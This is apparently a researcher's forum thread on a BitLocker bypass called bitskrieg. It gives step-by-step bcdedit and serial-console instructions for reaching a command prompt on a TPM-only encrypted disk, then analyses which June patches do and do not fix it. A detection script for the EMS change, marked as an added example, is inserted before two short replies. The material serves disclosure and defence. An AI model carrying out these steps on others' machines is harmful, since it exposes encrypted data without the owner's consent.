Well, bitskrieg is public.

While Microsoft "fixed" YellowKey as CVE-2026-45585 (and by "fixed", I mean they have provided manual steps that you can perform if you want to remove autofstx.exe from the WinRE registry BootExecute value), bitskrieg still works on such a system to achieve the same goal (getting access to a TPM-only Bitlocker encrypted disk, without knowing any credentials on the system). Though it requires a second computer, or a device that can communicate on a serial port. VM reproduction requires adding a serial port to the VM. Physical machines can reproduce the same with a supported USB-to-serial device.

1. Boot into WinRE (hold [shift] when clicking the reboot button)
2. Go to a command prompt, ignoring the prompt to enter a BitLocker recovery key. (Click Skip this drive)
3. Enable Emergency Management Services (EMS) to use a serial port as the EMS port.

bcdedit /set ems 1
bcdedit /set emsport 1

4. Reboot back into WinRE
5. From your other computer, connect to the serial port.
6. Type:

cmd
[esc]
tab
-
7. Enjoy your cmd.exe prompt (over serial) with a decrypted (assuming it's TPM-only) hard disk.

Note: Depending on the lineage of your Win11 installation, your WinRE experience may not give you a CMD.EXE prompt immediately upon clicking Skip this drive. Instead, it may say Command Prompt is unavailable because the OS drive is locked. If so, the exploit outlined above may not work.

Based on the "Publicly disclosed: yes", we can make an educated guess that CVE-2026-50507 is for bitskrieg. Because MSRC doesn't describe their updates in a way that uniquely identifies them, educated guesses are the best we can do. (There are three BitLocker bypasses that were fixed today)

If we take a bitskrieg-vulnerable machine and install today's updates, and then attempt to enter WinRE, we get an error:
"A required file couldn't be accessed because your BitLocker key wasn't loaded correctly." Perhaps I'm the only person on the planet who this will happen to, or possibly Microsoft didn't really test their fix for CVE-2026-50507 too well. 🤷‍♂️

We can fix this problem manually in an elevated CMD prompt:

reagentc /disable
reagentc /enable

This will reconfigure WinRE to properly use bitlocker.

After doing this, our once-vulnerable VM will now behave like other Windows systems that may not have been vulnerable to bitskrieg. That is, upon clicking Skip this drive when attempting to get a command prompt in WinRE, we get a message that Command Prompt is unavailable because the OS drive is locked. From here, the only way to get the command prompt is via the Restart to launch button, which appears to bypass/ignore our attempts to configure the EMS serial port.

Interestingly, regarding the three BitLocker bypass CVEs in June's updates (CVE-2026-45655, CVE-2026-45658, and CVE-2026-50507): if we take a Windows 11 25H2 VM and install only KB5094126 on it (which fixes all three CVEs), we can see that we can still use the bitskrieg exploit.

If we install all of the updates through June, we get the behavior of needing to reboot to get to Command Prompt via WinRE.

So, for Microsoft to say that KB5094126 is what fixes three bitlocker bypasses is a bit disingenuous. It (alone) does NOT.

In fact, we can try the OG YellowKey exploit on a Win11 25H2 system with KB5094126 installed. We should be protected, right?

Get real. If only KB5094126 (which is cumulative, as all Patch Tuesday updates are since 2015, and clocks in at 4.75GB) is installed, then Windows will still be vulnerable to YellowKey.

Did Microsoft attempt to fix YellowKey or bitskrieg? Nobody outside of Microsoft knows. MSRC publications don't say what they fix in any meaningful way. You just install all the updates and hope for the best.

Do we need to worry about this? No, not really. Having a stock Win11 25H2 system and installing only KB5094126 is not something you'd likely see in the real world. People generally install all of the updates.

And a Win11 with all of the updates through June will not allow Command Prompt to be directly entered via WinRE if Bitlocker is enabled for the OS disk.

If it's not KB5094126, which update fixes WinRE so that you can't get to Command Prompt directly? I have no clue. And I definitely don't have the time or patience to figure it out. If you really want to know, take it up with Microsoft.
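
A defender-side check for the EMS change made in step 3 of the thread, as an added example that is not part of the original posts: it parses `bcdedit /enum all` text and reports boot entries with EMS enabled or an EMS port configured. The sample output is constructed, and the English-locale "element name, whitespace, value" layout is an assumption.

```python
import re

# Constructed, abbreviated `bcdedit /enum all` text; layout is an assumption (English locale).
SAMPLE = """
Windows Boot Loader
-------------------
identifier              {current}

Windows Boot Loader
-------------------
identifier              {11111111-2222-3333-4444-555555555555}
description             Windows Recovery Environment
ems                     Yes

EMS Settings
------------
identifier              {emssettings}
bootems                 No
emsport                 1
"""
ENABLED = {"yes", "on", "1", "true"}

def parse_entries(text):
    """Return one dict per BCD entry, keyed by lower-cased element name."""
    entries = []
    for block in re.split(r"\r?\n[ \t]*\r?\n", text.strip()):
        lines = block.splitlines()
        if len(lines) < 3 or set(lines[1].strip()) != {"-"}:
            continue  # not a "title / dashes / elements" block
        entry = {"_type": lines[0].strip()}
        for line in lines[2:]:
            parts = line.split(None, 1)
            if len(parts) == 2 and not line[0].isspace():  # skip continuation lines
                entry[parts[0].lower()] = parts[1].strip()
        entries.append(entry)
    return entries

def ems_findings(text):
    """List (identifier, element, value) for enabled EMS flags and any configured EMS port."""
    found = []
    for entry in parse_entries(text):
        ident = entry.get("identifier", "?")
        for key in ("ems", "bootems"):
            if entry.get(key, "").lower() in ENABLED:
                found.append((ident, key, entry[key]))
        if "emsport" in entry:
            found.append((ident, "emsport", entry["emsport"]))
    return found

if __name__ == "__main__": print(ems_findings(SAMPLE))
```

On a fleet, feed it the saved output of `bcdedit /enum all` from each machine; any finding on a system that is not deliberately managed over serial is worth investigating.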

@wdormann, the reboot is for CVE-2026-20928.
@wdormann, the whole issue was a cold boot attack without "cold" and "boot" (you don't need to freeze something and (re)boot to dump the memory containing secrets).